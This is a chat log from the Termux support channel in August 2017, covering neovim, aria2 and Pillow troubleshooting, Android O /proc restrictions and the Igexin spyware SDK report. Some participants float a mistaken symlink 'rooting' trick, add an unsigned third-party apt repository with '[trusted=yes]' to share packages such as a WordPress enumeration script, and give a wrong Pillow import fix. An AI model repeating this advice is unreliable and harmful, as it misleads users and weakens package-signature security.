2017-08-22 06:47:27 Regenaxer Hi all! I try to start an app with a custom file format with “termux-share my/foo.pil”, but I get “Share with” “No apps can perform this action”
2017-08-22 06:47:44 Regenaxer The app has an
2017-08-22 06:47:54 Regenaxer (and other necessary params)
2017-08-22 06:48:16 Regenaxer I wonder what might be necessary to get it recognized
2017-08-22 07:11:16 deepakbndeepu frumpylava: I deleted it, I got the solution to that problem
2017-08-22 07:11:16 frumpylava deepakbndeepu: alright, cool.
2017-08-22 07:25:17 gitter (fornwall) @mklein994 & live_the_dream_s: can you updated to version 0.2.1~20170822-1 of neovim and see if it works ok for you now (without needing to change TERM)?
2017-08-22 07:32:59 azarus I’ve had issues with the latest neovim as well :(
2017-08-22 07:53:40 azarus I’ll update it soon.
2017-08-22 07:54:22 azarus Also, neovim seems to be creating weird directories for me, like nvimfd235w
2017-08-22 07:54:42 azarus That’s quite frustrating, makes all sorts of stuff go wrong.
2017-08-22 07:55:26 live_the_dream_s still getting error
2017-08-22 07:55:49 azarus Always these directories like ‘nvimfZIkdl’ :(
2017-08-22 07:56:37 live_the_dream_s wrong no error
2017-08-22 07:56:45 live_the_dream_s working fine!
2017-08-22 08:01:51 fornwall live_the_dream_s: great!
2017-08-22 08:29:06 gitter (mklein994) No error for me. Thanks!
2017-08-22 08:42:16 gitter (mklein994) azarus: If your talking about those in $PREFIX/tmp
, those are generated when you use Neovim. They can safely be deleted after using it if they bug you.
2017-08-22 08:43:08 azarus mklein994: No. not in $PREFIX/tmp, everywhere nvim is executed.
2017-08-22 08:43:21 frumpylava @mklein994 I had the same issue previously before it magically vanished a few months ago, where it would generate it the cwd where nvim is executed.
2017-08-22 08:44:50 gitter (mklein994) Is $TMPDIR set? I think it’s set by default now after a recent update to Termux.
2017-08-22 08:48:15 frumpylava @mklein994 that would be plausible, as I’ve set that manually and a few months ago as well to fix something unrelated.
2017-08-22 08:58:43 azarus Okay, I’ll set $TMPDIR in my .zshrc
2017-08-22 09:00:02 frumpylava @mklein994 I don’t think it is set by default now. I think it’s just set when texlive is installed.
2017-08-22 09:00:35 azarus The build of aria2 doesn’t work for me when installed from the repository. It works when I built it myself though!
2017-08-22 09:00:48 azarus For the ‘arm’ arch,
2017-08-22 09:01:56 gitter (mklein994) Oh… That makes sense. I also have set it manually to fix some unrelated build issues, and remember seeing it pop up in the commit history.
2017-08-22 09:02:07 gitter (mklein994) azarus: did that fix the Neovim problem?
2017-08-22 09:02:29 frumpylava hmm… perhaps aria2 needs to be rebuild because one of the dependencies got updated.
2017-08-22 09:02:49 azarus frumpylava: Yup, shouldn’t be too difficult.
2017-08-22 09:03:04 azarus mklein994: Didn’t test it extensively yet.
2017-08-22 09:32:26 frumpylava I can reproduce the segfaults on my arm device.
2017-08-22 13:07:26 maxamillion I just started donating to the patreon page, I’m a big fan … thanks to all involved in creating and maintaining Termux! :)
2017-08-22 13:34:22 fornwall frumpylava & azarus: a revision-bumped aria2 package is available at version 1.32.0-2
2017-08-22 13:34:25 fornwall does that fix the arm issue?
2017-08-22 13:52:13 azarus fornwall: Seems to, for me.
2017-08-22 13:58:44 fornwall azarus: great!
2017-08-22 14:39:32 tofupekoni hi! can anyone tell me how exactly I can disable the need to press alt, when using screen commands?
2017-08-22 14:41:45 tofupekoni been using termux for a while now and I’m just loving it! supercharget my android for sure!
2017-08-22 14:53:54 tofupekoni oh, now I understand, read the f’ng manual.. facepalm :D
2017-08-22 15:02:49 gitter (Auxilus) I found a method to root a device.. Just by executing ln -s /system/xbin/sudo /system/bin/su
and ln -s /system/xbin/sudo /system/xbin/su
2017-08-22 15:03:02 gitter (Auxilus) Is it a safe method?
2017-08-22 16:16:25 frumpylava How do I enable the Encrypt-to-self neomutt feature in mutt? https://www.neomutt.org/feature/encrypt-to-self I can’t find any option about it in .configure?
2017-08-22 18:18:57 knova_ python
2017-08-22 18:19:04 knova_ oops
2017-08-22 18:19:09 knova_ mt
2017-08-22 20:40:41 gitter (cocodevienne) Hey, @Auxilus.
2017-08-22 20:41:01 gitter (cocodevienne) Check this out, yo.
2017-08-22 20:41:35 gitter (cocodevienne) http://gitlab.con/cocodevienne/termuxpackagessource
2017-08-22 20:42:17 gitter (cocodevienne) What you asked for. Everybody else: Feel free to check it out as well!:)
2017-08-22 22:54:56 gitter (Auxilus) @cocodevienne link does not work
2017-08-23 03:51:48 gitter (suryapoo) Guys…any success with Java ?
2017-08-23 06:42:46 gitter (cocodevienne) hang on @Auxilus
2017-08-23 07:17:19 gitter (cocodevienne) https://gitlab.com/cocodevienne/termuxpackagessource
2017-08-23 07:17:31 gitter (cocodevienne) This link works now!
2017-08-23 07:17:53 gitter (cocodevienne) And here the packages for Desktop [ALL ARCHES]:
2017-08-23 07:18:12 gitter (cocodevienne) https://gitlab.com/cocodevienne/debianpackagessource
2017-08-23 07:18:22 gitter (cocodevienne) Some feedback would be great!
2017-08-23 07:26:47 gitter (cocodevienne) Wht doesn’t this work??
2017-08-23 07:26:49 gitter (cocodevienne) *Why
2017-08-23 07:27:24 gitter (cocodevienne) deb [trusted=yes] https://cocodevienne.gitlab.io/aptpackages/termuxpackages
2017-08-23 07:27:52 gitter (cocodevienne) When I add this to my sources.list
I get a malformed entry
error.
2017-08-23 07:28:06 gitter (cocodevienne) @fornwall
2017-08-23 08:52:17 gitter (cocodevienne) can someone help?
2017-08-23 09:01:01 gitter (Auxilus) @cocodevienne
2017-08-23 09:03:26 Church- Cocodevienne: 404 error mate.
2017-08-23 09:03:35 Church- S’nothing there.
2017-08-23 09:27:14 lolifang Is there any way to reset zoom to its default settings?
2017-08-23 09:27:46 lolifang I know I can pinch and stuff, but I’d like to know if there’s a way to “reset” it.
2017-08-23 11:27:54 frumpylava I find thid /proc Android O issue very concerning. These are very important features. It’s almost as if there is an expiry date on Termux.
2017-08-23 11:29:05 eggy proc issue?
2017-08-23 11:30:58 frumpylava https://github.com/termux/termux-app/issues/299
2017-08-23 11:33:14 icebal im on full O, still an issu
2017-08-23 11:34:16 icebal TCSAFLUSH during pkg install is also geting tcsetaddr 13: permission denied
2017-08-23 11:36:55 frumpylava I’ll definitely stay on Nougat until a workaround has been found. Possibly I’ll have use a custom rom for the first time in years.
2017-08-23 11:37:48 eggy :/
2017-08-23 11:47:05 gitter (cocodevienne) Go here for now: https://gitlab.com/cocodevienne/cocodevienne.gitlab.io
2017-08-23 11:47:08 gitter (cocodevienne) @Auxilus
2017-08-23 11:47:28 gitter (cocodevienne) @Church-
2017-08-23 11:48:10 gitter (Auxilus) @cocodevienne how do I add your repo to termux?
2017-08-23 11:48:50 gitter (cocodevienne) It said in the link I sent!:)
2017-08-23 11:48:54 gitter (cocodevienne) @Auxilus
2017-08-23 11:49:04 gitter (Auxilus) Kk ill check it out
2017-08-23 11:50:11 gitter (cocodevienne) If you have problems, tell me! For me the repo link isn’t working for some reason. I tagged @fornwall above for help.
2017-08-23 11:50:18 gitter (cocodevienne) Tell me if it works fine for you.
2017-08-23 11:50:53 gitter (cocodevienne) Don’t forget to close & restart Termux after updating “sources.list” and running apt update
.
2017-08-23 11:53:17 gitter (Auxilus) There must be something like extra
or something like that after your repo link in sources.list
2017-08-23 11:53:34 gitter (cocodevienne) Is it just me or is Android as a platform becoming more and more like IOS? @frumpylava
2017-08-23 11:53:47 gitter (cocodevienne) There is!:) @Auxilus
2017-08-23 11:53:52 gitter (cocodevienne) Does it work?
2017-08-23 11:54:07 gitter (Auxilus) Nah i dont remember that syntax…
2017-08-23 11:54:41 gitter (Auxilus) Im searching ri8 now
2017-08-23 11:58:45 gitter (cocodevienne) I wrote it there…
2017-08-23 11:58:49 gitter (cocodevienne) @Auxilus
2017-08-23 11:59:00 gitter (cocodevienne) Under “Installing”
2017-08-23 11:59:26 gitter (cocodevienne) Here: https://gitlab.com/cocodevienne/termuxpackagessources
2017-08-23 11:59:30 gitter (cocodevienne) @Auxilus
2017-08-23 12:09:55 gitter (aafrey) is there any documentation anywhere on how to use proot
?
2017-08-23 12:19:17 gitter (Auxilus) Nice, ill add it right away
2017-08-23 12:23:28 gitter (cocodevienne) Tell me if it works though! With me the link is broken for some reason.
2017-08-23 12:51:50 gitter (cocodevienne) @Auxilus
2017-08-23 12:55:35 frumpylava @cocodevienne yeah. All I really want is a portable Linux :(
2017-08-23 12:58:28 frumpylava Maybe I’ll just replace my phone with that one 7 inch laptop.
2017-08-23 13:00:28 gitter (cocodevienne) What for though? @frumpylava
2017-08-23 13:08:13 frumpylava I really want to do the bulk of my computing on a very small ultra-portable device. Right now Termux fills that void. But if Android gets any worde I’ll have to seriously look into alternatives.
2017-08-23 13:08:21 u0_a93 frumpylava: You can’t put a seven inch laptopin your pocket.
2017-08-23 13:08:40 frumpylava u0_a93: I know. :(
2017-08-23 13:12:27 gitter (cocodevienne) Have ypu looked into Nethunter?
2017-08-23 13:12:31 gitter (cocodevienne) #234
2017-08-23 13:13:11 gitter (cocodevienne) https://www.kali.org/kali-linux-nethunter/
2017-08-23 13:13:18 gitter (cocodevienne) @frumpylava
2017-08-23 13:14:57 frumpylava seems interessting. KDE Plasma also looks promissing.
2017-08-23 13:15:54 gitter (cocodevienne) There you go, keep your hat on!;)
2017-08-23 13:16:01 gitter (cocodevienne) @frumpylava
2017-08-23 13:16:16 gitter (cocodevienne) Yo, @Auxilus
2017-08-23 13:16:23 gitter (cocodevienne) How is it going??
2017-08-23 13:24:29 gitter (aafrey) trying to use termux on chromebook. app works great but I can’t use su
i’d like to use proot but can’t without su. any suggestions?
2017-08-23 13:24:58 gitter (aafrey) which su
yields /data/data/com.termux/files/usr/bin/su
2017-08-23 13:27:35 gitter (Auxilus) @cocodevienne
2017-08-23 13:27:38 gitter (Auxilus) N: Skipping acquire of configured file ‘extras/binary-aarch64/Packages’ as repository ‘http://cocodevienne.gitlab.io/aptpackages/termuxpackages termux InRelease’ doesn’t support architecture ‘aarch64’
2017-08-23 13:44:37 Church- PostmarketOS is coming along nicely. Cough cough
2017-08-23 13:44:40 Church- Wink winl
2017-08-23 13:44:43 Church- wink*
2017-08-23 13:44:48 Church- #postmarketos
2017-08-23 14:19:37 rods-tab3 termux ? https://arstechnica.com/information-technology/2017/08/500-google-play-apps-with-100-million-downloads-had-spyware-backdoor
2017-08-23 14:38:46 maxamillion rods-tab3: I’m not an android dev but a quick ‘git grep’ through the termux-app source repo from github and there’s no mention of lgexin
2017-08-23 14:43:28 u0_a93 https://blog.lookout.com/igexin-malicious-sdk rods-tab3:
2017-08-23 14:53:08 rods-tab3 a93 - thnx
2017-08-23 14:54:11 rods-tab3 maxa10^6 - did you grep all 685 apps installable from termux ?
2017-08-23 14:54:59 u0_a93 rods-tabs3v you’re welcome. tnx for your post too
2017-08-23 14:55:01 rods-tab3 and it could be self-modifiable code thats hides igexin until execution
2017-08-23 15:01:44 maxamillion rods-tab3: the apps in the repos? those are recompiled debian packages … do they really have anything to do with Android?
2017-08-23 15:02:32 rods-tab3 could someone sneek code in ?
2017-08-23 15:13:13 gitter (cocodevienne) Try to execute apt install nox
and tell me what happens?
2017-08-23 15:13:16 gitter (cocodevienne) @Auxilus
2017-08-23 15:14:41 gitter (Auxilus) Wait…
2017-08-23 15:15:01 gitter (Auxilus) @cocodevienne ye it installed
2017-08-23 15:15:30 gitter (cocodevienne) So you can execute nox -v
?
2017-08-23 15:15:35 gitter (cocodevienne) @Auxilus
2017-08-23 15:16:36 gitter (Auxilus) Ye, NOX 2017.0
2017-08-23 15:20:22 gitter (cocodevienne) Hm, funny.
2017-08-23 15:21:11 gitter (Auxilus) Why? @cocodevienne
2017-08-23 15:39:05 gitter (cocodevienne) Because with me I get a malformed
entry error. What exactly did you add to the sources.list
?
2017-08-23 15:39:14 gitter (cocodevienne) Just as I said in the tutorial?
2017-08-23 15:39:18 gitter (cocodevienne) @Auxilus
2017-08-23 16:00:28 gitter (Auxilus) Aye…
2017-08-23 16:01:02 gitter (Auxilus) deb [trusted=yes] http://cocodevienne.gitlab.io/aptpackages/termuxpackages termux extras
2017-08-23 16:01:20 gitter (cocodevienne) Haha what? @Auxilus
2017-08-23 16:01:47 gitter (Auxilus) I added this…
2017-08-23 16:02:20 gitter (Auxilus) localhost /d/d/c/files > apt list | grep /termux |
2017-08-23 16:02:20 gitter (Auxilus)
2017-08-23 16:02:20 gitter (Auxilus) WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
2017-08-23 16:02:20 gitter (Auxilus) [full message: https://gitter.im/termux/termux?at=599ddf4c614889d4757d02d4]
2017-08-23 16:02:21 gitter (cocodevienne) Oh right sorry,phone was going a bit mad.
2017-08-23 16:02:45 gitter (cocodevienne) What does that do?
2017-08-23 16:02:50 gitter (cocodevienne) @Auxilus
2017-08-23 16:03:09 zj1995 classic case of malvertising
2017-08-23 16:03:15 zj1995 also “The type of plugin that could be delivered was limited by the Android permission system”
2017-08-23 16:03:37 gitter (Auxilus) What?
2017-08-23 16:03:52 gitter (Auxilus) These are your packages.. Ri8?
2017-08-23 16:04:22 gitter (Auxilus) @cocodevienne id like to add package…
2017-08-23 16:04:33 gitter (cocodevienne) Yep, they are.
2017-08-23 16:04:36 gitter (cocodevienne) Which one?
2017-08-23 16:04:42 gitter (cocodevienne) Source please?
2017-08-23 16:04:46 gitter (cocodevienne) @Auxilus
2017-08-23 16:04:55 gitter (Auxilus) Its a script for WordPress enumeration
2017-08-23 16:05:23 gitter (Auxilus) Its python script
2017-08-23 16:05:30 gitter (Auxilus) Called D-TECT
2017-08-23 16:05:42 gitter (cocodevienne) Can we use that on Termux?
2017-08-23 16:06:08 gitter (Auxilus) Yup..
2017-08-23 16:07:02 gitter (Auxilus) Its on git.. Clone it and build deb..
2017-08-23 16:16:12 u0_a93 leverages Android’s dalvik.system.DexClassLoader and reflection to load the specified class from the JAR file
2017-08-23 16:19:22 u0_a93 data collected through the PhoneStateListener
2017-08-23 16:20:16 u0_a93 500 apps with >100m downloads
2017-08-23 16:22:40 u0_a93 Lookout isn’t publishing the list of the affected 500 apps because researchers don’t believe the developers knew of the spyware capabilities included in the SDK.
2017-08-23 16:22:45 zj1995 this is where apple makes sense with its policies that disallow apps that can execute code not originally included as part of it
2017-08-23 16:23:29 u0_a93 zh1995: Can you afford Apple?
2017-08-23 16:23:34 zj1995 yes
2017-08-23 16:24:59 u0_a93 good for you
2017-08-23 16:25:32 zj1995 even then i won’t use an iphone because it’s way too restrictive
2017-08-23 16:25:35 rods-tab3 thats why termux got kicked off the google store
2017-08-23 16:25:52 zj1995 wait it did?
2017-08-23 16:26:07 u0_a93 Inside the Stealth Destroyer USS Zumwalt, the Warship That Runs on Linux
2017-08-23 16:26:33 u0_a93 http://www.popularmechanics.com/military/weapons/news/a27804/stealth-destroyer-uss-zumwalt-linux/
2017-08-23 16:27:43 rods-tab3 google store has same policy re installing forign apps
2017-08-23 16:28:50 rods-tab3 a few ? weeks ago; termux taken off the store
2017-08-23 16:29:38 zj1995 oh i never noticed that
2017-08-23 16:30:11 u0_a93 rods-tab3: That’s incorrect. Termux got pulled from Google Play “because it violates the payments policy”. https://plus.google.com/s/Termux%20app%20pulled/top
2017-08-23 16:30:31 zj1995 tbh it’s gotten a lot less useful since android n, which restricted /proc access
2017-08-23 16:31:04 zj1995 i used to use it and htop to see which app used cpu cycles and therefore battery life
2017-08-23 16:32:22 gitter (cocodevienne) Send me a link!!
2017-08-23 16:32:25 gitter (cocodevienne) @Auxilus
2017-08-23 16:33:00 gitter (Auxilus) Sure wait…
2017-08-23 16:33:30 gitter (Auxilus) Here > https://github.com/shawarkhanethicalhacker/D-TECT
2017-08-23 16:43:01 rods-tab3 zj1995 - andro n more restrictive than 6 ? how so ?
2017-08-23 16:46:26 fornwall rods-tab3: android n restricted /proc to only show processes of the same pid as the app accessing it
2017-08-23 16:47:02 fornwall rods-tab3: that is, only termux-spawned processes are visible in /proc when accessed inside termux, not system processes or processes belonging to other apps
2017-08-23 16:52:02 zj1995 android o supposedly takes that further by hiding /proc altogether
2017-08-23 16:52:35 zj1995 this breaks more than just things like ps/top/htop
2017-08-23 16:53:22 u0_a93 oreo
2017-08-23 17:01:50 rods-tab3 what about native android apps like ‘OS monitor’ – are they restricted also ?
2017-08-23 17:03:19 zj1995 depends on how they get cpu/ram usage information
2017-08-23 17:03:41 zj1995 android already exposes ram usage in developer options
2017-08-23 17:05:27 fornwall right, the /proc access restrictions affects everyone. you may get some information in other means, but apps like OS monitor won’t likely work
2017-08-23 17:05:38 fornwall “Due to Android 7.0’s security enhancement, OS Monitor won’t support Android 7.0 and following version”
2017-08-23 17:06:43 fornwall so google is really locking down android. pity for those wanting to access linux functionality, but makes sense for the majority of users I guess
2017-08-23 17:06:51 zj1995 fx (the file explorer) still shows cpu/ram/storage usage on android 7
2017-08-23 17:07:18 zj1995 don’t have an android o installation to test that but if anyone is willing to see if it still works that would be nice
2017-08-23 17:07:36 fornwall zj1995: usage per-app or total system usage?
2017-08-23 17:07:44 zj1995 total system usage
2017-08-23 17:08:46 fornwall right, total system usage is exposed through an official android api (the ActivityManager.MemoryInfo class) so don’t need direct /proc access
2017-08-23 17:09:05 fornwall per-app usage is not, AFAIK
2017-08-23 17:10:30 zj1995 android’s /proc restriction is so widely enforced to the point that the setting in developer options to show cpu usage only shows systemui as the top process
2017-08-23 17:10:51 zj1995 iirc 7.0.1 removed that from developer options altogether
2017-08-23 17:11:08 fornwall ah, funny one :)
2017-08-23 17:11:31 zj1995 surpringly adb shell can still read /proc in 7.0.1
2017-08-23 17:11:51 zj1995 which also means top works from there
2017-08-23 17:11:53 fornwall interesting. how about android o?
2017-08-23 17:12:03 zj1995 not sure
2017-08-23 17:17:32 gitter (cocodevienne) You should build it and host it yourself, maintaining mine is lots of work as is.
2017-08-23 17:17:36 gitter (cocodevienne) @Auxilus
2017-08-23 17:17:58 gitter (cocodevienne) Besides, I have a company to run.
2017-08-23 17:18:00 gitter (cocodevienne) ;)
2017-08-23 17:18:08 gitter (cocodevienne) No offence dude.
2017-08-23 17:20:38 rods-tab3 so whats a girl to do if she wants to find whats using all the cpu/mem in andro 7++ ?
2017-08-23 17:22:30 zj1995 cpu - look at cpu time for each app under battery statistics, memory - look at running processes in developer options
2017-08-23 17:22:55 zj1995 it’s not as convenient as (h)top but it’s at least something
2017-08-23 18:04:48 u0_a93 Is it possible to install adb in Termux?
2017-08-23 18:08:14 u0_a93 $ adb
2017-08-23 18:08:14 u0_a93 No command ‘adb’ found, did you mean:
2017-08-23 18:08:14 u0_a93 Command ‘ab’ from package ‘apache2’
2017-08-23 18:18:08 u0_a93 Android adb has interesting results for adb apps
2017-08-23 18:18:21 u0_a93 on Android
2017-08-23 18:24:45 u0_a93 @fornwall Will it be possible to launch Termux inside an adb shell on Android?
2017-08-23 18:35:40 guest093 rods-tab3: self-modifiable code -)
2017-08-23 18:41:29 guest093 https://duckduckgo.com/?q=ios+store+malicious+software
2017-08-23 18:42:44 guest093 http://www.computerworld.com/article/2984689/mobile-security/apple-ios-app-store-malware-xcodeghost-itbwcw.html
2017-08-23 18:43:33 guest093 Apple iOS App Store riddled with malware – XcodeGhost haunts…
2017-08-23 18:45:12 guest093 @fornwall Specifically Termux in an adb shell instead of bash.
2017-08-23 18:46:42 zj1995 i feel like such an app wouldn’t be allowed on the play store at all
2017-08-23 18:46:58 zj1995 users would need to sideload it
2017-08-23 18:50:46 guest093 such an app zj1995: Can you elaborate on “such an app”?
2017-08-23 18:52:47 zj1995 i obviously have no idea what the guidelines for apps that can be published on google play are, but i’m just not sure if an app that exposes such functions can be allowed
2017-08-23 18:53:17 guest093 @fornwall If top and htop are the only affected apps, then possibly modifying these two to lauch in an adb shell might resolve unreadble /proc issue in oreo
2017-08-23 18:53:20 guest093 ?
2017-08-23 18:54:07 zj1995 the adb user has permissions that go beyond regular apps and completely bypasses android’s permission system
2017-08-23 18:55:02 guest093 zj1995: Some of the limitations in Androud are ludecrous, complete insanity for nearly any PC user.
2017-08-23 18:55:17 zj1995 i agree
2017-08-23 18:55:34 guest093 lol
2017-08-23 18:55:41 zj1995 i don’t like how google is dumbing down android for more knowledgeable users
2017-08-23 18:56:15 zj1995 they’re making it less and less usable without root
2017-08-23 18:57:20 guest093 one the other hand there are more non PC users worldwide than PC users.
2017-08-23 18:58:49 guest093 zj1995: I agree that there should be an official Android release, “Proceed at your own risk su
, sudo
!”
2017-08-23 18:58:59 guest093 with source code
2017-08-23 18:59:19 zj1995 sadly the days of that have long passed
2017-08-23 18:59:33 zj1995 i feel like what drew me to android in the first place is slowly getting eroded
2017-08-23 19:01:13 guest093 This is a terrible choice for future Android development by not giving the user the opportunity to proceed at their discretion to open root ability for the Android users.
2017-08-23 19:02:41 guest093 terrible choice *terrible choice by Google (Alphabet) for
2017-08-23 19:04:17 guest093 zj1995: After decades of use, I am sorry to know that I am allergic to desktops and similar.
2017-08-23 19:10:58 g093 https://github.com/android/platform_system_core/tree/master/adb
2017-08-23 19:18:29 g093 @fornwall
2017-08-23 19:18:34 g093 _____
2017-08-23 19:18:34 g093 ( wow )
2017-08-23 19:18:34 g093 —–
2017-08-23 19:18:34 g093 o ^__^
2017-08-23 19:18:34 g093 o (oo)___
2017-08-23 19:18:34 g093 (__)\ )\/\
2017-08-23 19:18:34 g093 | —-w |
2017-08-23 19:18:34 g093 |
2017-08-23 19:19:15 g093 aapt/stable,now 7.1.2.33-1 aarch64 [installed]
2017-08-23 19:22:55 g093 hypnotic, mesmerizing and more hypnosis watching aapt and friends build https://github.com/sdrausty/buildAPKs
2017-08-23 19:23:47 g093 btw cowsay at https://github.com/sdrausty/buildAPKsApps/tree/master/Cowsay-android built in Termux on Android.
2017-08-23 19:26:30 g093 THANK YOU
2017-08-23 19:39:02 gitter (sdrausty) cowsay
’s output looks great in weechat on Termux. It looks like crap in gitter in Chrome on Android. 🤔
2017-08-23 19:40:56 gitter (sdrausty) Termux. *Termux 💪 on an Android smartphone.
2017-08-23 19:43:03 g093 It also looks matrix-like in the newly built in Termux on a smartphone deployed step*.apk
2017-08-23 19:43:40 g093 deployed *just deployed
2017-08-23 19:45:58 rods-tab3 oh, thats a cow … mooooooo
2017-08-23 19:47:19 g093 ____________
2017-08-23 19:47:19 g093 ( Do you like having Termux💪on )
2017-08-23 19:47:19 g093 ( your Android 5-6.* smartphone? )
2017-08-23 19:47:19 g093 ——————————–
2017-08-23 19:47:19 g093 o ^__^
2017-08-23 19:47:19 g093 o (oo)___
2017-08-23 19:47:19 g093 (__)\ )\/\
2017-08-23 19:47:19 g093 | —-w |
2017-08-23 19:47:19 g093 |
2017-08-23 19:48:28 g093 Output was transferred via Android clipboard feature.
2017-08-23 19:50:18 g093 Output was transferred via Android clipboard feature into weechat on Termux.
2017-08-23 19:50:24 rods-tab3 some of us do not have a phone But a real computer - an eight inch android tablet
2017-08-23 19:50:32 g093 cool
2017-08-23 19:51:31 g093 i wish i could afford a nice big screen tablet, eight inches rods-tab3: nice
2017-08-23 19:53:12 g093 afford *as in tablet +iOS goodies, etc
2017-08-23 19:53:14 g093 .
2017-08-23 20:09:04 g093 Are there any open souece linux emulators for ios?
2017-08-23 20:09:41 rod-yolo that tablet was 109 usd but POS since lenovo can not get andro to run in 1 GB ram
2017-08-23 20:09:56 g093 open souece linux *open source
2017-08-23 20:11:21 rod-yolo ios is @nix
2017-08-23 20:15:43 g093 rods-tab3: @least one (1) of my Android smartphones has eight (8) processors @quite a bit of RAM (DRAM, etc.)
2017-08-23 20:18:40 g093 proccessors @quite a bit of *proccessors & @quit a bit of
2017-08-23 20:56:57 rods-tab3 yea they have phones w 8 core cpu / 8 GB ram …
2017-08-23 20:58:34 rods-tab3 i use a BT keyboard/mouse w this tablet
2017-08-23 21:22:11 g093 rods-tab3: Take a transit stop “linux in you pocket” Termux example, you probably would not want to be using either tablet, or keyboard with/without mouse; But what many people use at a transit stop, a smartphone. Please do not limit this example only to mass transit stops or stations.
2017-08-23 21:38:54 rods-tab3 i sometimes use phone on Amtrak - does that count ? ::–))
2017-08-23 21:39:13 g093 lol
2017-08-23 21:39:32 g093 Android Oreo is wreaking havoc with people’s… http://bgr.com/2017/08/23/android-oreo-bluetooth-problems/
2017-08-23 21:40:26 rods-tab3 they just announced O 8 – how can people have it already ?
2017-08-23 21:41:37 live_the_dream image is uploaded for google devices like pixel phones
2017-08-23 21:41:42 live_the_dream same time
2017-08-23 21:47:42 rods-tab3 best to wait for .1 version of anything http://bgr.com/2017/08/22/android-8-0-oreo-update-download-pixel-nexus/
2017-08-23 21:48:32 rods-tab3 after all termux up to version 53++
2017-08-23 21:50:05 live_the_dream i wish termux used mlterm as base but its not anywhere close in terms od android integration than what termux is based on. it has sixel zupport though
2017-08-23 21:50:41 live_the_dream but yeah you can load mlterm in android
2017-08-23 21:52:26 g093 flashing oreo today https://developer.android.com/about/versions/oreo/download.html
2017-08-23 21:52:36 g093 oreo *oreos
2017-08-23 21:53:14 live_the_dream fornwall: think you could get mounting windows shared in termux-api? there are examples available for implementing it?
2017-08-23 21:53:16 rods-tab3 Good luck; it was nice knowing you.
2017-08-23 22:48:35 gitter (themastersunil) aarch64-linux-android-clang -Wno-unused-result -Wsign-compare -Wunreachable-code -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -Os -Os -fPIC -DHAVE_LIBJPEG -DHAVE_OPENJPEG -DHAVE_LIBZ -DHAVE_LIBTIFF -DPILLOW_VERSION=”4.2.1” -I/data/data/com.termux/files/usr/include/openjpeg-2.1 -I/data/data/com.termux/files/usr/tmp/pip-build-436hshbe/Pillow/libImaging -I/data/data/com.termux/files/usr/include -I/data/data/com.termux/files
2017-08-23 22:48:36 gitter _imaging.c -o build/temp.linux-aarch64-3.6/_imaging.o
2017-08-23 22:48:36 gitter (themastersunil) _imaging.c:74:10: fatal error: ‘Python.h’ file not found
2017-08-23 22:48:36 gitter (themastersunil) #include “Python.h”
2017-08-23 22:48:36 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=599e3e8476a757f808d8aa36]
2017-08-23 22:49:06 gitter (themastersunil) Please help me.. 😥
2017-08-23 23:07:53 gitter (Grimler91) @themastersunil There are many many people who have had that error before at github. Just search for the error and you’ll find the solution. Or google it
2017-08-23 23:48:11 g093 or duckduckgo.com it dogpile.com
2017-08-23 23:50:55 g093 you might want to add site to your query, i.e. https://duckduckgo.com/?q=Python.h+site%3Agithub.com
2017-08-23 23:58:09 g093 you might want *you will probably want
2017-08-24 03:41:04 live_the_dream oh btw got openjdk working with aarch64
2017-08-24 04:29:20 frumpylava Weird question. Does anyone know if there is a thermal printer that works with termux? Ideally I am looking for something like the gameboy printer.
2017-08-24 07:10:13 gitter (SatryoBagus_P_twitter) please help me ```
2017-08-24 07:10:13 gitter (SatryoBagus_P_twitter) proot warning : can’t chdir (“/root/.”)in the guest rootfs : no such file or directory
2017-08-24 07:10:13 gitter (SatryoBagus_P_twitter) proot info: default working directory is now “/”
2017-08-24 07:10:13 gitter (SatryoBagus_P_twitter) [full message: https://gitter.im/termux/termux?at=599eb41466c1c7c477d7885a]
2017-08-24 07:12:26 gitter (SatryoBagus_P_twitter) @themastersunil gan punya gua error di bagian saat start ubuntu
2017-08-24 07:13:04 gitter (its-pointless) @vishalbiswas https://github.com/its-pointless/termux-packages/tree/openjdk-wip using arm64 instead of aarch64 makes java build
2017-08-24 07:22:06 gitter (SatryoBagus_P_twitter) @Neo-Oli please help me ```
2017-08-24 07:22:06 gitter (SatryoBagus_P_twitter) proot warning : can’t chdir (“/root/.”)in the guest rootfs : no such file or directory
2017-08-24 07:22:06 gitter (SatryoBagus_P_twitter) proot info: default working directory is now “/”
2017-08-24 07:22:06 gitter (SatryoBagus_P_twitter) [full message: https://gitter.im/termux/termux?at=599eb6debc46472974b92d95]
2017-08-24 08:03:31 gitter (Sprite140) can someone please help me install PIL? Everytime I try to work with it I get this message.
2017-08-24 08:03:31 gitter (Sprite140)
2017-08-24 08:03:31 gitter (Sprite140) $ python2 main.py
2017-08-24 08:03:31 gitter (Sprite140) [full message: https://gitter.im/termux/termux?at=599ec093ee5c9a4c5ff4afa1]
2017-08-24 09:17:39 gitter (cocodevienne) Uhm hoow about running pip install pillow
?
2017-08-24 09:17:46 gitter (cocodevienne) @Sprite140
2017-08-24 09:18:06 gitter (cocodevienne) Or in your case pip2
?
2017-08-24 09:22:30 gitter (Sprite140) @cocodevienne I tried to run pip install pillow and it says
2017-08-24 09:23:07 gitter (Sprite140) @cocodevienne Requirement already satisfied: pillow in /data/data/com.termux/files/usr/lib/python3.6/site-packages
2017-08-24 09:23:07 gitter (Sprite140) Requirement already satisfied: olefile in /data/data/com.termux/files/usr/lib/python3.6/site-packages (from pillow)
2017-08-24 09:24:25 gitter (Sprite140) now it’s saying The headers or library files could not be found for zlib,
2017-08-24 09:24:25 gitter (Sprite140) a required dependency when compiling Pillow from source.
2017-08-24 09:24:32 gitter (Sprite140) when I do pip2 install pillow
2017-08-24 09:26:20 gitter (cocodevienne) Read the code up there which you posted and read what you installed.
2017-08-24 09:27:04 gitter (cocodevienne) You wrote from PIL import Image
not from pillow import Image
.
2017-08-24 09:27:17 gitter (cocodevienne) Try that and then tell me what happens.
2017-08-24 09:27:53 gitter (Sprite140) it just says from pillow import Image
2017-08-24 09:27:53 gitter (Sprite140) No command ‘from’ found, did you mean:
2017-08-24 09:27:53 gitter (Sprite140) Command ‘frob’ from package ‘frobtads’
2017-08-24 09:28:08 gitter (cocodevienne) Inside the Python script!!
2017-08-24 09:28:13 gitter (cocodevienne) Not from the cmd.
2017-08-24 09:28:21 gitter (cocodevienne) Dude, come on.
2017-08-24 09:29:00 gitter (Sprite140) what do you mean? I typed that into the python script
2017-08-24 09:29:03 gitter (Sprite140) lol I’m a girl
